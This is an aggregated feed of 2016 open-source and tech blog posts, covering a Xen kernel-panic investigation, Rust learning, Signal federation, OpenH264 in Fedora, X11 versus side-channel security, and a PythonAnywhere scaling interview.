title: "Final Draft" - originally published 5/11/2016

For the latest news in PHD Comics, CLICK HERE!

by PHD Comics at 2016-05-12 20:00

Bluejo's Journal

Thud: Poor Relations - Bluejo's Journal

Words: 1665
Total words: 55304
Files: 5
Music: No music, no writing music on the computer, should get some
Tea: Elderflower and Lemon
Reason for stopping: bedtime

Revised the chapter I wrote Saturday, and wrote a new alien bit. And I know what happens next. Well, reasonably -- at the right degree I need to know to start writing it.

I am in Orleans. If I am going to travel more, I need to get better at writing while I am travelling, so.

Back to Paris tomorrow and then Saint Malo for Etonnants Voyageurs Saturday.

by Bluejo's Journal (bluejo@gmail.com) at 2016-05-12 19:59

Planet Debian

Ingo Juergensmann: Xen randomly crashing server - part 2 - Planet Debian

Some weeks ago I blogged about "Xen randomly crashing server". The problem back then was that I couldn't get any information why the server reboots. Using a netconsole was not possible, because netconsole refused to work with the bridge that is used for Xen networking. Luckily my colocation partner rrbone.net connected the second network port of my server to the network so that I could use eth1 instead of the bridged eth0 for netconsole.

Today the server crashed several times and I was able to collect some more information than just the screenshots from IPMI/KVM console as shown in my last blog entry (full netconsole output is attached as a file): 

May 12 11:56:39 31.172.31.251 [829681.040596] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 3.16.0-4-amd64 #1 Debian 3.16.7-ckt25-2
May 12 11:56:39 31.172.31.251 [829681.040647] Hardware name: Supermicro X9SRE/X9SRE-3F/X9SRi/X9SRi-3F/X9SRE/X9SRE-3F/X9SRi/X9SRi-3F, BIOS 3.0a 01/03/2014
May 12 11:56:39 31.172.31.251 [829681.040701] task: ffffffff8181a460 ti: ffffffff81800000 task.ti: ffffffff81800000
May 12 11:56:39 31.172.31.251 [829681.040749] RIP: e030:[<ffffffff812b7e56>]
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.040802] RSP: e02b:ffff880280e03a58  EFLAGS: 00010286
May 12 11:56:39 31.172.31.251 [829681.040834] RAX: ffff88026eec9070 RBX: ffff88023c8f6b00 RCX: 00000000000000ee
May 12 11:56:39 31.172.31.251 [829681.040880] RDX: 00000000000004a0 RSI: ffff88006cd1f000 RDI: ffff88026eec9422
May 12 11:56:39 31.172.31.251 [829681.040927] RBP: ffff880280e03b38 R08: 00000000000006c0 R09: ffff88026eec9062
May 12 11:56:39 31.172.31.251 [829681.040973] R10: 0100000000000000 R11: 00000000af9a2116 R12: ffff88023f440d00
May 12 11:56:39 31.172.31.251 [829681.041020] R13: ffff88006cd1ec66 R14: ffff88025dcf1cc0 R15: 00000000000004a8
May 12 11:56:39 31.172.31.251 [829681.041075] FS:  0000000000000000(0000) GS:ffff880280e00000(0000) knlGS:ffff880280e00000
May 12 11:56:39 31.172.31.251 [829681.041124] CS:  e033 DS: 0000 ES: 0000 CR0: 0000000080050033
May 12 11:56:39 31.172.31.251 [829681.041153] CR2: ffff88006cd1f000 CR3: 0000000271ae8000 CR4: 0000000000042660
May 12 11:56:39 31.172.31.251 [829681.041202] Stack:
May 12 11:56:39 31.172.31.251 [829681.041225]  ffffffff814d38ff
May 12 11:56:39 31.172.31.251  ffff88025b5fa400
May 12 11:56:39 31.172.31.251  ffff880280e03aa8
May 12 11:56:39 31.172.31.251  9401294600a7012a
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041287]  0100000000000000
May 12 11:56:39 31.172.31.251  ffffffff814a000a
May 12 11:56:39 31.172.31.251  000000008181a460
May 12 11:56:39 31.172.31.251  00000000000080fe
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041346]  1ad902feff7ac40e
May 12 11:56:39 31.172.31.251  ffff88006c5fd980
May 12 11:56:39 31.172.31.251  ffff224afc3e1600
May 12 11:56:39 31.172.31.251  ffff88023f440d00
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041407] Call Trace:
May 12 11:56:39 31.172.31.251 [829681.041435]  <IRQ>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.041441]
May 12 11:56:39 31.172.31.251  [<ffffffff814d38ff>] ? ndisc_send_redirect+0x3bf/0x410
May 12 11:56:39 31.172.31.251 [829681.041506]  [<ffffffff814a000a>] ? ipmr_device_event+0x7a/0xd0
May 12 11:56:39 31.172.31.251 [829681.041548]  [<ffffffff814bc74c>] ? ip6_forward+0x71c/0x850
May 12 11:56:39 31.172.31.251 [829681.041585]  [<ffffffff814c9e54>] ? ip6_route_input+0xa4/0xd0
May 12 11:56:39 31.172.31.251 [829681.041621]  [<ffffffff8141f1a3>] ? __netif_receive_skb_core+0x543/0x750
May 12 11:56:39 31.172.31.251 [829681.041729]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.041771]  [<ffffffffa0585eb2>] ? br_handle_frame_finish+0x1c2/0x3c0 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041821]  [<ffffffffa058c757>] ? br_nf_pre_routing_finish_ipv6+0xc7/0x160 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041872]  [<ffffffffa058d0e2>] ? br_nf_pre_routing+0x562/0x630 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041907]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.041955]  [<ffffffff8144fb65>] ? nf_iterate+0x65/0xa0
May 12 11:56:39 31.172.31.251 [829681.041987]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042035]  [<ffffffff8144fc16>] ? nf_hook_slow+0x76/0x130
May 12 11:56:39 31.172.31.251 [829681.042067]  [<ffffffffa0585cf0>] ? br_handle_local_finish+0x80/0x80 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042116]  [<ffffffffa0586220>] ? br_handle_frame+0x170/0x240 [bridge]
May 12 11:56:39 31.172.31.251 [829681.042148]  [<ffffffff8141ee24>] ? __netif_receive_skb_core+0x1c4/0x750
May 12 11:56:39 31.172.31.251 [829681.042185]  [<ffffffff81009f9c>] ? xen_clocksource_get_cycles+0x1c/0x20
May 12 11:56:39 31.172.31.251 [829681.042217]  [<ffffffff8141f42f>] ? netif_receive_skb_internal+0x1f/0x80
May 12 11:56:39 31.172.31.251 [829681.042251]  [<ffffffffa063f50f>] ? xenvif_tx_action+0x49f/0x920 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042299]  [<ffffffffa06422f8>] ? xenvif_poll+0x28/0x70 [xen_netback]
May 12 11:56:39 31.172.31.251 [829681.042331]  [<ffffffff8141f7b0>] ? net_rx_action+0x140/0x240
May 12 11:56:39 31.172.31.251 [829681.042367]  [<ffffffff8106c6a1>] ? __do_softirq+0xf1/0x290
May 12 11:56:39 31.172.31.251 [829681.042397]  [<ffffffff8106ca75>] ? irq_exit+0x95/0xa0
May 12 11:56:39 31.172.31.251 [829681.042432]  [<ffffffff8135a285>] ? xen_evtchn_do_upcall+0x35/0x50
May 12 11:56:39 31.172.31.251 [829681.042469]  [<ffffffff8151669e>] ? xen_do_hypervisor_callback+0x1e/0x30
May 12 11:56:39 31.172.31.251 [829681.042499]  <EOI>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.042506]
May 12 11:56:39 31.172.31.251  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042561]  [<ffffffff810013aa>] ? xen_hypercall_sched_op+0xa/0x20
May 12 11:56:39 31.172.31.251 [829681.042592]  [<ffffffff81009e7c>] ? xen_safe_halt+0xc/0x20
May 12 11:56:39 31.172.31.251 [829681.042627]  [<ffffffff8101c8c9>] ? default_idle+0x19/0xb0
May 12 11:56:39 31.172.31.251 [829681.042666]  [<ffffffff810a83e0>] ? cpu_startup_entry+0x340/0x400
May 12 11:56:39 31.172.31.251 [829681.042705]  [<ffffffff81903076>] ? start_kernel+0x497/0x4a2
May 12 11:56:39 31.172.31.251 [829681.042735]  [<ffffffff81902a04>] ? set_init_arg+0x4e/0x4e
May 12 11:56:39 31.172.31.251 [829681.042767]  [<ffffffff81904f69>] ? xen_start_kernel+0x569/0x573
May 12 11:56:39 31.172.31.251 [829681.042797] Code:
May 12 11:56:39 31.172.31.251  <f3>
May 12 11:56:39 31.172.31.251 
May 12 11:56:39 31.172.31.251 [829681.043113] RIP
May 12 11:56:39 31.172.31.251  [<ffffffff812b7e56>] memcpy+0x6/0x110
May 12 11:56:39 31.172.31.251 [829681.043145]  RSP <ffff880280e03a58>
May 12 11:56:39 31.172.31.251 [829681.043170] CR2: ffff88006cd1f000
May 12 11:56:39 31.172.31.251 [829681.043488] ---[ end trace 1838cb62fe32daad ]---
May 12 11:56:39 31.172.31.251 [829681.048905] Kernel panic - not syncing: Fatal exception in interrupt
May 12 11:56:39 31.172.31.251 [829681.048978] Kernel Offset: 0x0 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffff9fffffff)

I'm not that good at reading this kind of output, but to me it seems that ndisc_send_redirect is at fault. When googling for "ndisc_send_redirect" you can find a patch on lkml.org and Debian bug #804079, both seem to be related to IPv6.

When looking at the linux kernel source mentioned in the lkml patch I see that this patch is already applied (line 1510): 

        if (ha) 
                ndisc_fill_addr_option(buff, ND_OPT_TARGET_LL_ADDR, ha);

So, when the patch was intended to prevent "leading to data corruption or in the worst case a panic when the skb_put failed" it does not help in my case or in the case of #804079.

Any tips are appreciated!

PS: I'll contribute to that bug in the BTS, of course!

AttachmentSize
syslog-xen-crash.txt24.27 KB
Kategorie: 
 

by ij at 2016-05-12 18:38

LWN.net

Thursday's security advisories - LWN.net

Debian-LTS has updated ocaml (code execution) and xerces-c (code execution).

Fedora has updated kernel (F23: information leak), ntp (F22: multiple vulnerabilities), php (F22: multiple vulnerabilities), subversion (F23: two vulnerabilities), and xen (F23: two vulnerabilities).

Mageia has updated libtasn1 (denial of service) and squid (two vulnerabilities).

Oracle has updated pcre (OL7: multiple vulnerabilities).

Red Hat has updated kernel (RHEL7: privilege escalation), kernel-rt (RHEL7; RHEL6: privilege escalation), and thunderbird (two vulnerabilities).

Slackware has updated thunderbird (multiple vulnerabilities).

SUSE has updated mysql (SLE11: multiple vulnerabilities), ntp (SLE11: multiple vulnerabilities), and php5 (SLE12: multiple vulnerabilities).

Ubuntu has updated qemu, qemu-kvm (multiple vulnerabilities).

by jake at 2016-05-12 16:44

Julia Evans

A second try at using Rust - Julia Evans

I used Rust for the first time in late 2013, while trying to write a tiny operating system. At the time, I learned a lot and it was pretty fun, but I found the experience pretty frustrating. There were all these error messages I didn't understand! It took forever to work with strings! Everyone was very nice but it felt confusing.

I just tried Rust again yesterday! Kamal has been trying to sell me (and everyone else) on the idea that if you're doing systems-y work, and you don't know any systems language very well, then it's worth learning Rust.

After a day or so of trying Rust again, I think he's right that learning Rust is easier than learning C. A few years after first trying, I feel like the language has progressed a lot, and it feels more like writing Python or some other easy language.

Some things I could do easily without working too hard

  • run a process and then match a regular expression on its output
  • make a hashmap, store counts in it, and print the top 10
  • format strings nicely and print them
  • read command line options
  • allocate a lot of memory without creating a memory leak

Those things would have been really hard in C (how do you even make a hashmap??? I think you have to write the data structure yourself or something.). I probably could have figured out how to free memory in C (i hear you use free :) ) but honestly I don't know how to write C and it's very likely it would have turned into an unmaintainable mess. The things were maybe slightly harder to do than in Python (which is a programming language that I actually know), but I think not way way way harder. I was surprised at how easy they were!

a sidebar on learning programming languages

I pair programmed a bunch of Rust code with Kamal, who actually knows Rust. Sometimes when I program, I try to understand everything all at once right away ("what are lifetime? how do they work? what are all these pointer types? omg!!!"). This time I tried a new approach! When I didn't understand something, I was just like "hey kamal tell me what to type!" and he would, and then my program would work.

I'd fix the bugs that I understood, and he'd fix the bugs I didn't, and we made a lot of progress really quickly and it wasn't that frustrating.

I kind of enjoy the experience of having a Magical Oracle to fix my programming problems for me -- having someone elide away the harder stuff so I can focus on what's easy feels to me like a good way to learn.

Of course, you can't let someone else fix all your hard programs forever. Eventually I'll have to understand all about Rust pointers and lifetimes and everything, if I want to write Rust! I bet it's not even all that hard. But for today I only understand like 6 things and that's fine.

error messages

I've also been mostly happy with the Rust error messages! Sometimes they're super inscrutable, but often they're mostly lucid. Sometimes they link to GitHub issues, and someone on the GitHub issue will have a workaround for your problem! Sometimes they come with detailed explanations!

Here's an example:

$ rustc --explain E0281
`You tried to supply a type which doesn't implement some trait in a location
which expected that trait. This error typically occurs when working with
`Fn`-based types. Erroneous code example:

---
fn foo<F: Fn()>(x: F) { }

fn main() {
    // type mismatch: the type ... implements the trait `core::ops::Fn<(_,)>`,
    // but the trait `core::ops::Fn<()>` is required (expected (), found tuple
    // [E0281]
    foo(|y| { });
}
---

The issue in this case is that `foo` is defined as accepting a `Fn` with no
arguments, but the closure we attempted to pass to it requires one argument.

valgrind + perf + rust = <3

another cool thing I noticed is that you can run valgrind or perf on the Rust program and figure out easily which parts of your program are running slowly! And I think the Rust program even has debug info so you can look at the source code in kcachegrind. This was really cool. I ran into a program with valgrind where my program worked fine in Rust, but when I ran it under valgrind it failed. I don't understand why this happened at all.

the rust docs actually seem good?

I haven't delved super a lot into the Rust docs, but so far I've been happy: there's a book and lots of other documentation and it's all official on the Rust website! I think they actually paid Steve Klabnik to write docs, which is amazing.

Here is my Rust project!. More on what it actually does later, but I'm super excited about it (for now it's a MYSTERY :D :D).

by Julia Evans at 2016-05-12 15:55

Planet GNOME

Stef Walter: Cockpit 0.106 - Planet GNOME

Cockpit is the modern Linux admin interface. There’s a new release every week. Here are the highlights from this weeks 0.106 release.

Stable Cockpit Styles

One of the annoying things about CSS is that when you bring in stylesheets from multiple projects, they can conflict. You have to choose a nomen-clature to namespace your CSS, or nest it appropriately.

We’re stabilizing the internals of Cockpit in the browser, so when folks write plugins, they can count on them working. To make that happen we had to namespace all our own Cockpit specific CSS classes. Most of the styling used in Cockpit come from Patternfly and this change doesn’t affect those styles at all.

Documentation is on the wiki

Container Image Layers

Docker container image layers are now shown much more clearly. It should be clearer to tell which is the base layer, and how the others are layered on top:

Image Layers

Try it out

Cockpit 0.106 is available now:

by Planet GNOME at 2016-05-12 15:40

Planet Ubuntu

Ubuntu Podcast from the UK LoCo: S09E11 – Sweet Baby Robocop - Ubuntu Podcast - Planet Ubuntu

It’s Episode Eleven of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

by Planet Ubuntu at 2016-05-12 15:11

Planet GNOME

Matthew Garrett: Convenience, security and freedom - can we pick all three? - Planet GNOME

Moxie, the lead developer of the Signal secure communication application, recently blogged on the tradeoffs between providing a supportable federated service and providing a compelling application that gains significant adoption. There's a set of perfectly reasonable arguments around that that I don't want to rehash - regardless of feelings on the benefits of federation in general, there's certainly an increase in engineering cost in providing a stable intra-server protocol that still allows for addition of new features, and the person leading a project gets to make the decision about whether that's a valid tradeoff.

One voiced complaint about Signal on Android is the fact that it depends on the Google Play Services. These are a collection of proprietary functions for integrating with Google-provided services, and Signal depends on them to provide a good out of band notification protocol to allow Signal to be notified when new messages arrive, even if the phone is otherwise in a power saving state. At the time this decision was made, there were no terribly good alternatives for Android. Even now, nobody's really demonstrated a free implementation that supports several million clients and has no negative impact on battery life, so if your aim is to write a secure messaging client that will be adopted by as many people is possible, keeping this dependency is entirely rational.

On the other hand, there are users for whom the decision not to install a Google root of trust on their phone is also entirely rational. I have no especially good reason to believe that Google will ever want to do something inappropriate with my phone or data, but it's certainly possible that they'll be compelled to do so against their will. The set of people who will ever actually face this problem is probably small, but it's probably also the set of people who benefit most from Signal in the first place.

(Even ignoring the dependency on Play Services, people may not find the official client sufficient - it's very difficult to write a single piece of software that satisfies all users, whether that be down to accessibility requirements, OS support or whatever. Slack may be great, but there's still people who choose to use Hipchat)

This shouldn't be a problem. Signal is free software and anybody is free to modify it in any way they want to fit their needs, and as long as they don't break the protocol code in the process it'll carry on working with the existing Signal servers and allow communication with people who run the official client. Unfortunately, Moxie has indicated that he is not happy with forked versions of Signal using the official servers. Since Signal doesn't support federation, that means that users of forked versions will be unable to communicate with users of the official client.

This is awkward. Signal is deservedly popular. It provides strong security without being significantly more complicated than a traditional SMS client. In my social circle there's massively more users of Signal than any other security app. If I transition to a fork of Signal, I'm no longer able to securely communicate with them unless they also install the fork. If the aim is to make secure communication ubiquitous, that's kind of a problem.

Right now the choices I have for communicating with people I know are either convenient and secure but require non-free code (Signal), convenient and free but insecure (SMS) or secure and free but horribly inconvenient (gpg). Is there really no way for us to work as a community to develop something that's all three?

comment count unavailable comments

by Planet GNOME at 2016-05-12 14:50

planet.freedesktop.org

Christian Schaller: H264 in Fedora Workstation - planet.freedesktop.org

So after a lot of work to put the policies and pieces in place we are now giving Fedora users access to the OpenH264 plugin from <a href="http://www.cisco.comCisco.
Dennis Gilmore posted a nice blog entry explaining how you can install OpenH264 in Fedora 24.

That said the plugin is of limited use today for a variety of reasons. The first being that the plugin only supports the Baseline profile. For those not intimately familiar with what H264 profiles are they are
basically a way to define subsets of the codec. So as you might guess from the name Baseline, the Baseline profile is pretty much at the bottom of the H264 profile list and thus any file encoded with another profile of H264 will not work with it. The profile you need for most online videos is the High profile. If you encode a file using OpenH264 though it will work with any decoder that can do Baseline or higher, which is basically every one of them.
And there are some things using H264 Baseline, like WebRTC.

But we realize that to make this a truly useful addition for our users we need to improve the profile support in OpenH264 and luckily we have Wim Taymans looking at the issue and he will work with Cisco engineers to widen the range of profiles supported.

Of course just adding H264 doesn’t solve the codec issue, and we are looking at ways to bring even more codecs to Fedora Workstation. Of course there is a limit to what we can do there, but I do think we will have some announcements this year that will bring us a lot closer and long term I am confident that efforts like Alliance for Open Media will provide us a path for a future dominated by royalty free media formats.

But for now thanks to everyone involved from Cisco, Fedora Release Engineering and the Workstation Working Group for helping to make this happen.

by planet.freedesktop.org at 2016-05-12 14:30

Planet GNOME

Morten Welinder: Security From Whom? - Planet GNOME

Secure from whom? I was asked after my recent post questioning the positioning of Mir/Wayland as security improvement.

Excellent question — I am glad you asked! Let us take a look at the whos and compare.

To take advantage of the X11 protocol issues, you need to be able to speak X11 to the server. Assuming you haven’t misconfigured something (ssh or your file permissions) so other users’ software can talk to your
server, that means causing you to run evil X11 protocol code like XEvilTeddy. Who can do that? Well, there are probably a few thousand people who can. That is a lot, but most of application developers or maintainers who have to sneak the changes in via source form. That is possible, but it is slow, has high risk of discovery, and has problems with deniability. And choosing X11 as a mechanism is just plain silly. Just contact a command-and-control server and download the evil payload instead. There are also a smaller number of people who can attack via binaries, either because distributions take binaries directly from them or because the can change and re-sign binary packages. That would mean your entire distribution is compromised and choosing the X11 attack is really silly again.

Now, let us look at the who of a side-channel attack. This requires the ability to run code on your machine,
but it does not have to be code that can speak X11 to your X server equivalent. It can be sand-boxed code such as javascript even when the sand-box is functioning as designed. Who can do that? Well, anyone who controls a web server you visit; plus any adserver network used by such web servers; plus anyone buying ads from such adserver networks. In short, just about anyone. And tracking the origin of such code created by an evil advertiser would be extremely hard.

So to summarize: attacking the X11 protocol is possible by a relatively small group of people who have much better methods available to them; attacking via side-channel can be done by a much wider group who probably do not have better methods. The former threat is so small as to be irrelevant in the face of the second.

Look, it is not that I think of security in black and white terms. I do not. But if improved security is your motivation then looking at a Linux laptop and deciding that pouring man-decades into a partial replacement for the X server is what needs doing is a bad engineering decision when there are so many more important concerns, i.e., you are doing it wrong. And selling said partial X server replacement as a security improvement is at best misleading and uninformed.

On the other hand, if you are working on Mir/Wayland because that kind of thing floats your boat, then fine. But please do not scream “security!” when you break, say, my colour picker.

by Planet GNOME at 2016-05-12 13:20

Planet Python

Python Anywhere: Scaling a startup from side project to 20 million hits/month - an interview with railwayapi.com creator Kaustubh - Planet Python

We recently wished farewell to a customer who had been with us for about 18 months, during which time he saw some incredible growth in what was originally just a side project. We spoke to him about how he found the experience of scaling on PythonAnywhere, and why he decided to move on.

railwayapi.com stats
Project started:October 2014
Requests:20 million / month
Active users:1000+

What's your background? How long have you been programming?

I am currently pursuing Bachelor's in Computer Science & Engineering. I have been programming from school days but RailwayAPI was the first substantial project I did.

Can you describe what railwayapi.com does? What first gave you the idea to build a site like this?

It all started with an idea to build an app which let Train travelers in India find the best available route between two stations. It's very difficult to get confirmed bookings in India and so I thought it would be great if there was an app which helps people break their journey up, using multiple trains to reach their destination in minimum time.

While working on that idea I realized that I needed train data to make such a thing possible. There wasn't a reliable API for Indian railways and I realized that several developers would be facing the same problem. And hence RailwayAPI was born.

It is a collection of APIs which let developers access all kinds of Railway data like Seat Availability, Train Route, Live Train status etc in easy-to-use JSON formats.

Why did you choose Python and Flask? Are you happy with your choice?

Python was the language I already knew well and there were several great libraries available for it so the decision was very easy to make for me.

Since the exposed part of the API was just going to be URL views which capture GET requests and return the corresponding JSON, Flask was the most suitable with its minimality which is enough for what I was doing.

What made you choose PythonAnywhere?

This was my first webapp and initially I had very little experience in setting up such an environment. After some research I stumbled upon PythonAnywhere which was extremely easy to set up, with a nice and clean UI. It also lets you instantly scale up your app by just sliding the number of workers you are going to need. After that I needn't go anywhere else!

Your site quickly became one of our busiest sites -- when did you realise it was getting big? How was the experience of scaling up on PythonAnywhere?

I realized that it was getting big when one of the user complained about load balancer errors they were getting. But it wasn't an issue as I quickly scaled up the number of workers and site was back to normal functioning in seconds.

What kind of traffic did you have last month, for example?

The site got about 19.6 million requests last month! And for the month before that it was about 16 million requests.

You've now decided to move on -- why is that, where did you move to, and was it easy to make the transition?

Yes, I have moved to a VPS now at Digital Ocean. It wasn't an easy decision to make for me and it was done only after considerable thought. I loved PythonAnywhere and I continue to love it but I needed more flexible configurations so a VPS was required at the current stage.

It was quite difficult to move to a VPS because I have grown accustomed with the ease of use at PythonAnywhere where everything is pre set up and you can just focus on writing your code instead of writing configurations.

In general, what do you think are the pros and cons of PythonAnywhere?

I think I have already mentioned a lot of Pros about PythonAnywhere. But in short if you just want to focus on building your app rather than setting up environment, which is what ideally it should be than there are very few places like PythonAnywhere out there. Also developers should know that setting up an environment is not a one off process, it requires constant monitoring and changes so that any modification in the code doesn't break the configuration and vice versa. Its quite a time consuming process but PythonAnywhere takes care of all of that.

I would have liked it if PA supported asynchronous workers. In fact this was the main reason for moving out because my application was Network I/O bound and async workers were better suited for such a task, and that wasn't available here, at least for now.

Also it would be great if Redis and Web Sockets were also supported at some point.

It sounds like the site was a big success. What's next for railwayapi.com?

The goal is to give developers access to Indian Railways data without hassle. There are some other ideas I am working on like making available Train and Seat Availability prediction/analytics through API.

Do you have any advice for other aspiring web developers?

I am still learning a lot myself!

Although I could say from my experience that the most important thing I learned while developing the API was that engineering your App to be scalable is one the most challenging tasks, which is often overlooked by people in the beginning.

I had to re-code several of the modules several times because they resembled 'hacky' code but as the pressure on the site grew they started to break. So it would be good if developers also think about how their app would respond to such scenarios in the future.

Thanks again Kaustubh, and best of luck with the future of the project!

by Planet Python at 2016-05-12 12:44

Kushal Das: Report: Fedora 24 Cloud/Atomic test day - Planet Python

Last Tuesday we had a Fedora 24 test day about Fedora Cloud, and Atomic images. With help from Adam Williamson I managed to setup the test day. This was first time for me to use the test day web app, where the users can enter results from their tests.

Sayan helped to get us the list of AMI(s) for the Cloud base image. We also found our first bug from this test day here, it was not an issue in the images, but in fedimg. fedimg is the application which creates the AMI(s) in an automated way, and it was creating AMI(s) for the atomic images. Today sayan applied a hotfix for the same, I hope this will take care of issue.

While testing the Atomic image, I found docker was not working in the image, but it worked in the Cloud base image. I filed a bug on the same, it seems we already found the root cause in another bug. The other major issue was about upgrade of the Atomic image failing, and it was also a known issue.

In total 13 people volunteered in the test day from Fedora QA, and Cloud SIG groups. It was a successful event as we found some major issues, but we will be happy not to have any issues at all :)

by Planet Python at 2016-05-12 12:00